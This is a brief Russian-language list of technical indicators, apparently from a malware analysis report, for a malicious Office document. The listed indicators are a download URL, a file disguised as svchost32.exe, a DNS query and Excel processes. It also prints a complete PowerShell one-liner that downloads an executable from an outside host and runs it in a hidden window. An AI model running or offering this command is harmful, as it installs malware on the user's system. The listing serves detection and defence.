Техническая информация
- https://fbcom.review/f/8.exe как %temp%\svchost32.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{490d11ed-17d4-469a-9aea-adde689a9a3c}.tmp
- DNS ASK fb###.review
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('https://fbcom.review/f/8.exe','%TEMP%\svchost32.exe');Start-Process '%TEMP%\svchost32.exe' (со скрытым окном)